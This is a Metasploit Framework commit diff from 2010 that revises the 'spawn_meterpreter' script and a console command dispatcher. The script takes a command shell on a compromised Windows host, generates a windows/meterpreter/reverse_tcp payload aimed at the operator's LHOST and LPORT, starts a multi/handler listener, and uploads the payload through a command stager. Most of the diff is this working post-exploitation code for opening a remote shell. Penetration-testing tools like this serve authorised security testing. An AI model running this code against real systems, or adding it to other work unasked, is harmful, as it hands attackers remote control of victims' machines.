clean up, add comments, and fix bug in command dispatcher, fixes #394

git-svn-id: file:///home/svn/framework3/trunk@8808 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-03-12 22:59:19 +00:00
parent 7b41d08387
commit a811ad0c32
2 changed files with 40 additions and 21 deletions

View File

@ -1257,7 +1257,7 @@ class Core
if ((session = framework.sessions.get(sid))) if ((session = framework.sessions.get(sid)))
if (session.interactive?) if (session.interactive?)
if (session.type == "shell") # XXX: check for windows? if (session.type == "shell") # XXX: check for windows?
session.execute_script('spawn_meterpreter', val) session.execute_script('spawn_meterpreter', nil)
else else
print_error("Session #{sid} is not a command shell session.") print_error("Session #{sid} is not a command shell session.")
end end

View File

@ -9,16 +9,24 @@
# -jduck # -jduck
# #
use_handler = true
raise RuntimeError, "You must select a session." if (not session)
raise RuntimeError, "Selected session is not a command shell session!" if (session.type != "shell")
# Check for required datastore options
if (not framework.datastore['LHOST'] or not framework.datastore['LPORT'])
raise RuntimeError, "You must set LPORT and LHOST for this script to work."
end
lhost = framework.datastore['LHOST'] lhost = framework.datastore['LHOST']
lport = framework.datastore['LPORT'] lport = framework.datastore['LPORT']
# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (framework.datastore['DisablePayloadHandler'] == true)
if (session.type != "shell")
raise RuntimeError, "Selected session is not a command shell session!"
end
# Process special var/val pairs... # Process special var/val pairs...
# XXX: Not supported yet...
#Msf::Ui::Common.process_cli_arguments($framework, ARGV) #Msf::Ui::Common.process_cli_arguments($framework, ARGV)
# Create the payload instance # Create the payload instance
payload_name = 'windows/meterpreter/reverse_tcp' payload_name = 'windows/meterpreter/reverse_tcp'
@ -27,15 +35,18 @@ options = 'LHOST='+lhost + ' LPORT='+lport
buf = payload.generate_simple('OptionStr' => options) buf = payload.generate_simple('OptionStr' => options)
#
# Spawn the handler if needed
#
mh = nil
if (use_handler) if (use_handler)
#print_status("Starting handler for #{payload_name} on port #{lport}") mh = framework.modules.create("exploit/multi/handler")
multihandler = framework.modules.create("exploit/multi/handler") mh.datastore['LPORT'] = lport
multihandler.datastore['LPORT'] = lport mh.datastore['LHOST'] = lhost
multihandler.datastore['LHOST'] = lhost mh.datastore['PAYLOAD'] = payload_name
multihandler.datastore['PAYLOAD'] = payload_name mh.datastore['ExitOnSession'] = true # auto-cleanup
multihandler.datastore['ExitOnSession'] = false mh.datastore['EXITFUNC'] = 'process'
multihandler.datastore['EXITFUNC'] = 'process' mh.exploit_simple(
multihandler.exploit_simple(
'LocalInput' => session.user_input, 'LocalInput' => session.user_input,
'LocalOutput' => session.user_output, 'LocalOutput' => session.user_output,
'Payload' => payload_name, 'Payload' => payload_name,
@ -44,6 +55,9 @@ if (use_handler)
# a bit to make sure the exploit is fully working. Without this, # a bit to make sure the exploit is fully working. Without this,
# mod.get_resource doesn't exist when we need it. # mod.get_resource doesn't exist when we need it.
Rex::ThreadSafe.sleep(0.5) Rex::ThreadSafe.sleep(0.5)
if framework.jobs[mh.job_id.to_s].nil?
raise RuntimeError, "Failed to start multi/handler"
end
end end
@ -57,6 +71,10 @@ def progress(total, sent)
end end
end end
#
# Setup the command stager
#
los = 'win' los = 'win'
larch = ARCH_X86 larch = ARCH_X86
opts = { opts = {
@ -65,6 +83,9 @@ opts = {
linelen = 1700 linelen = 1700
delay = 0.25 delay = 0.25
#
# Generate the stager command array
#
cmdstager = Rex::Exploitation::CmdStager.new(buf, framework, los, larch) cmdstager = Rex::Exploitation::CmdStager.new(buf, framework, los, larch)
cmds = cmdstager.generate(opts, linelen) cmds = cmdstager.generate(opts, linelen)
if (cmds.nil? or cmds.length < 1) if (cmds.nil? or cmds.length < 1)
@ -72,12 +93,16 @@ if (cmds.nil? or cmds.length < 1)
raise ArgumentError raise ArgumentError
end end
#
# Calculate the total size
#
total_bytes = 0 total_bytes = 0
cmds.each { |cmd| total_bytes += cmd.length } cmds.each { |cmd| total_bytes += cmd.length }
# $stderr.puts("CmdStager generated %u commands (%u bytes)" % [cmds.length, total_bytes])
#
# Run the commands one at a time
#
begin begin
sent = 0 sent = 0
cmds.each { |cmd| cmds.each { |cmd|
@ -96,9 +121,3 @@ begin
rescue ::Interrupt rescue ::Interrupt
# TODO: cleanup partial uploads! # TODO: cleanup partial uploads!
end end
if (use_handler)
print_status("cleaning up...")
# XXX: stop the job
end